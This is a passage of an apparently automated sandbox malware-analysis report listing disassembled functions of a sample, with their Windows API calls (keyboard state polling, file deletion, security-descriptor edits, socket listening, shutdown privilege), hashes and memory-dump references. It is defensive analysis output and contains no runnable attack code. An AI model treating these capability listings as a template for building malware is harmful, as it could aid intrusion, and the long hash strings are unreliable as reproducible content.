                                                            • _wcscmp.LIBCMT ref: 0020F3AA
                                                              • Part of subcall function 002045C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002045DC
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0020F3D9
                                                            • FindClose.KERNEL32(00000000), ref: 0020F3E4
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0020F400
                                                            • _wcscmp.LIBCMT ref: 0020F427
                                                            • _wcscmp.LIBCMT ref: 0020F43E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020F450
                                                            • SetCurrentDirectoryW.KERNEL32(0025A5A0), ref: 0020F46E
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0020F478
                                                            • FindClose.KERNEL32(00000000), ref: 0020F485
                                                            • FindClose.KERNEL32(00000000), ref: 0020F497
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: da52ea3716a8c28cee48e4fcfbc151d06ae9610c5b362605aec89e5bee90ad7d
                                                            • Instruction ID: 1ffe2dba887360a5ca1c7b296ee0ed16c58775355349238bb243a6eca0616ebd
                                                            • Opcode Fuzzy Hash: da52ea3716a8c28cee48e4fcfbc151d06ae9610c5b362605aec89e5bee90ad7d
                                                            • Instruction Fuzzy Hash: A631043255035A7ACB70AFA4ED88EDE77BC9F09320F1042B5ED10A34E2E770DA65CA54
                                                            Function 001F81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
                                                              • Part of subcall function 001F874A: GetLastError.KERNEL32(?,001F822A,?,?,?), ref: 001F8770
                                                              • Part of subcall function 001F874A: GetProcessHeap.KERNEL32(00000008,?,?,001F822A,?,?,?), ref: 001F877F
                                                              • Part of subcall function 001F874A: HeapAlloc.KERNEL32(00000000,?,001F822A,?,?,?), ref: 001F8786
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F879D
                                                              • Part of subcall function 001F87E7: GetProcessHeap.KERNEL32(00000008,001F8240,00000000,00000000,?,001F8240,?), ref: 001F87F3
                                                              • Part of subcall function 001F87E7: HeapAlloc.KERNEL32(00000000,?,001F8240,?), ref: 001F87FA
                                                              • Part of subcall function 001F87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001F8240,?), ref: 001F880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F825B
                                                            • _memset.LIBCMT ref: 001F8270
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001F828F
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F82A0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001F82DD
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F82F9
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F8316
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001F8325
                                                            • HeapAlloc.KERNEL32(00000000), ref: 001F832C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001F834D
                                                            • CopySid.ADVAPI32(00000000), ref: 001F8354
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001F8385
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F83AB
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F83BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 5d80d4ce0ab07fc8d85421ca422347bdca7deb95fdb928b8db5904e1277a4aa4
                                                            • Instruction ID: 6f91cf14f96107c81a447272091b515ec35894dfe5bf4e60c6bb56be2b917d1d
                                                            • Opcode Fuzzy Hash: 5d80d4ce0ab07fc8d85421ca422347bdca7deb95fdb928b8db5904e1277a4aa4
                                                            • Instruction Fuzzy Hash: 3C615771900619ABDF109FA5DD89EFEBBB9FF04700F148129FA15A62A1DB319A05CB60
                                                            Function 001B6843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJ$$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-3620513318
                                                            • Opcode ID: 9f5656de31c905a9924d3f0013d422f32fcdfddd3a5ab915927dcc02a311e2a3
                                                            • Instruction ID: b2c288b2b89d4cd1b07edad9bc8b32994ac7ca5c92b412cfc6dadbfd0232543c
                                                            • Opcode Fuzzy Hash: 9f5656de31c905a9924d3f0013d422f32fcdfddd3a5ab915927dcc02a311e2a3
                                                            • Instruction Fuzzy Hash: 11727C75E00219DBDB28CF98C8807FEB7B5FF58710F15816AE949EB290DB749981CB90
                                                            Function 00220665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220737
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002207D6
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0022086E
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00220AAD
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00220ABA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: e853f7653573061eec8316a668d34f1e0737c0c087c8e79fee6f4a3839b6a969
                                                            • Instruction ID: 6b3ca282e4699ab529c346794e734fbbc44ed0f5ae93d01849d210e85a662835
                                                            • Opcode Fuzzy Hash: e853f7653573061eec8316a668d34f1e0737c0c087c8e79fee6f4a3839b6a969
                                                            • Instruction Fuzzy Hash: CDE16C31214211AFCB14DF64D885E6BBBF4EF89714B04886DF94ADB2A2DB30ED51CB51
                                                            Function 00200219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00200241
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 002002C2
                                                            • GetKeyState.USER32(000000A0), ref: 002002DD
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 002002F7
                                                            • GetKeyState.USER32(000000A1), ref: 0020030C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00200324
                                                            • GetKeyState.USER32(00000011), ref: 00200336
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0020034E
                                                            • GetKeyState.USER32(00000012), ref: 00200360
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00200378
                                                            • GetKeyState.USER32(0000005B), ref: 0020038A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 7072e6a7c10a19d7175ee0820baecdc8627170c13fd6e6bd0e4ad25531f2515f
                                                            • Instruction ID: 37f2945289aaff41f6ede2391d6559aae8e8e6f0a6c2b43c584ea9ad6d954fdd
                                                            • Opcode Fuzzy Hash: 7072e6a7c10a19d7175ee0820baecdc8627170c13fd6e6bd0e4ad25531f2515f
                                                            • Instruction Fuzzy Hash: 2D41CB345247CB6EFF724FA494883B5BEA0AF12340F4841DDD9C5461C3DB945DE48792
                                                            Function 00214458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: 03e8a97d468c99a378815e9ddd1138bc38e710a6d5c8295b3551778812d4779f
                                                            • Instruction ID: 8e073a531b29712f86e7d56d2be44c8b0a4946698942866f2d7842a1807c6a13
                                                            • Opcode Fuzzy Hash: 03e8a97d468c99a378815e9ddd1138bc38e710a6d5c8295b3551778812d4779f
                                                            • Instruction Fuzzy Hash: 53218D35210221AFDB20AF60ED0DB6E77B8EF24714F10806AF94ADB2B1DB74AD41CB54
                                                            Function 00203A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A48A1,?,?,001A37C0,?), ref: 001A48CE
                                                              • Part of subcall function 00204CD3: GetFileAttributesW.KERNEL32(?,00203947), ref: 00204CD4
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00203ADF
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00203B87
                                                            • MoveFileW.KERNEL32(?,?), ref: 00203B9A
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00203BB7
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00203BD9
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00203BF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 9f4073acde6b1d25a02466dfc3d9744628434e0918322c0aceafdf1cafb73abd
                                                            • Instruction ID: dafa0ad027064c4d8f4c39c483af831f7c317a619ec6d4beeb66b0c89c1eec57
                                                            • Opcode Fuzzy Hash: 9f4073acde6b1d25a02466dfc3d9744628434e0918322c0aceafdf1cafb73abd
                                                            • Instruction Fuzzy Hash: 79519035905249AACF15EBE0DE928EDB779AF25304F2441A9E402B70D2EF306F09CB60
                                                            Function 0020F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0020F6AB
                                                            • Sleep.KERNEL32(0000000A), ref: 0020F6DB
                                                            • _wcscmp.LIBCMT ref: 0020F6EF
                                                            • _wcscmp.LIBCMT ref: 0020F70A
                                                            • FindNextFileW.KERNEL32(?,?), ref: 0020F7A8
                                                            • FindClose.KERNEL32(00000000), ref: 0020F7BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 15341d6b49be80600842be4d42757df9d0d8163e5da4a8158371fee3e627d80e
                                                            • Instruction ID: 94fb7588f1e718801309a1a9dc9a034d06a19e75919910c12a5b7c7e685ef9ff
                                                            • Opcode Fuzzy Hash: 15341d6b49be80600842be4d42757df9d0d8163e5da4a8158371fee3e627d80e
                                                            • Instruction Fuzzy Hash: DB41AE7595020AAFCF61DFA4CD49AEEBBB8FF15310F104166E814A31E1EB309E54CB91
                                                            Function 001B4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: 4f538388386a017a5a8bba94e0e9f37671bc94483c54cbb0eed22e5b9d86c684
                                                            • Instruction ID: b9c975054c205314723343c73c701751c9ef925ce45e9c7e326e7bf466a85dd1
                                                            • Opcode Fuzzy Hash: 4f538388386a017a5a8bba94e0e9f37671bc94483c54cbb0eed22e5b9d86c684
                                                            • Instruction Fuzzy Hash: 4AA28D70E0465ACBDF28CF59C9907FDB7B1BF55314F2581AAE85AA7281E7309E81CB40
                                                            Function 001B58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 6cc8d43d5fe1261b96107d792442d15a7c40748ea3469cb795439f9fef786724
                                                            • Instruction ID: 641cb5fece644da4397264c362f027daa41bae3c697f23bdbda8aa7a39bcd03d
                                                            • Opcode Fuzzy Hash: 6cc8d43d5fe1261b96107d792442d15a7c40748ea3469cb795439f9fef786724
                                                            • Instruction Fuzzy Hash: B7128A70A00609EFDF15DFA4D985AEEB7F6FF58300F108569E806A7291EB35AE11CB50
                                                            Function 0020545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
                                                              • Part of subcall function 001F8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
                                                              • Part of subcall function 001F8CC3: GetLastError.KERNEL32 ref: 001F8D47
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0020549B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: eb2ffd03e50b90e950bb3d3a58446d629edd7e1376bc9f09bb146b1a27138bd6
                                                            • Instruction ID: ed7112de7be04505e6fa13094c6695a81b72ddb8bf7f61bbd0b3c7fee753c5f6
                                                            • Opcode Fuzzy Hash: eb2ffd03e50b90e950bb3d3a58446d629edd7e1376bc9f09bb146b1a27138bd6
                                                            • Instruction Fuzzy Hash: D6012431674B266AE7786E74AC4ABFB7268EB05342F200530FD06D20D3DAA00CA089A0
                                                            Function 00216596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002165EF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002165FE
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 0021661A
                                                            • listen.WSOCK32(00000000,00000005), ref: 00216629
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216643
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00216657
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 009c7f8fc820871505ff82dcbbb8e17727b22359d65c502391619612dac33078
                                                            • Instruction ID: 618513ac9990d1e1ab24beeb02521017b63e0031edfc7b4be821e3798885f5a7
                                                            • Opcode Fuzzy Hash: 009c7f8fc820871505ff82dcbbb8e17727b22359d65c502391619612dac33078
                                                            • Instruction Fuzzy Hash: 2721D035200205AFCB10EF64D989B6EB7F9EF59320F108169E916E73E1CB70AD81CB51
                                                            Function 001B5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                            • _memmove.LIBCMT ref: 001F062F
                                                            • _memmove.LIBCMT ref: 001F0744
                                                            • _memmove.LIBCMT ref: 001F07EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: dfc94da80952d2c0dda43e2e5529149d274b1fd13b190ef4b8d23e1b1828122d
                                                            • Instruction ID: dfa6ae31f0afafa7c714ee263d36a9021c14ccd7d4d632832b2ec0eb82efe716
                                                            • Opcode Fuzzy Hash: dfc94da80952d2c0dda43e2e5529149d274b1fd13b190ef4b8d23e1b1828122d
                                                            • Instruction Fuzzy Hash: CA0291B0E00209DFDF05DF64D981ABEBBB5EF58300F1580A9E806DB256EB31DA51CB91
                                                            Function 001A1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 001A19FA
                                                            • GetSysColor.USER32(0000000F), ref: 001A1A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 001A1A61
                                                              • Part of subcall function 001A1290: DefDlgProcW.USER32(?,00000020,?), ref: 001A12D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 312dc18b5ceb5ee634673d36e8d6efa54f81c989360587568ada201cfa83d233
                                                            • Instruction ID: a4b8dcfbe117c2e58863038a56ed8c17c921ce3a60784c5b91a775b9dfb48400
                                                            • Opcode Fuzzy Hash: 312dc18b5ceb5ee634673d36e8d6efa54f81c989360587568ada201cfa83d233
                                                            • Instruction Fuzzy Hash: 90A17979119594FAD63CAB686C88DBF359DEB43355F26021BF403D7291CF248D11D2B2
                                                            Function 00216A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 002180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
